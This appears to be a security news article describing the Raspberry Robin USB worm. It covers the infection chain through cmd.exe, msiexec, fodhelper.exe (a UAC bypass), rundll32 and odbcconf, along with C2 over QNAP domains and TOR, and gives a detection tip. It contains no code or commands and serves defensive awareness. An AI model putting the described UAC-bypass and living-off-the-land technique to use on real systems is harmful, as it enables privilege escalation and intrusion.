Raspberry Robin Worm – Turn Around

Raspberry Robin is a Windows worm discovered by researchers that propagates through removable USB devices. Earlier this year we have covered an article explaining an overview of the malware

The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure.

Spotted in September 2021, it targets organizations in the technology and manufacturing industries. Initial access is typically through infected removable drives, often USB devices.

The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.

Then msiexec.exe launches a legitimate Windows utility, fodhelper.exe, which in turn run rundll32.exe to execute a malicious command. Experts pointed out that processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt.

According to the researchers, looking for fodhelper.exe as a parent process it is possible to detect the threat.

• fodhelper (a trusted binary for managing features in Windows settings),
• msiexec (command line Windows Installer component),
• odbcconf (a tool for configuring ODBC drivers).

Now Microsoft confirmed that the threat was discovered on the networks of multiple customers, including organizations in the technology and manufacturing sectors.

It is believed that Raspberry Robin represents a high risk to organizations because it could be used by threat actors as an entry point in the target networks and to drop additional malicious payloads.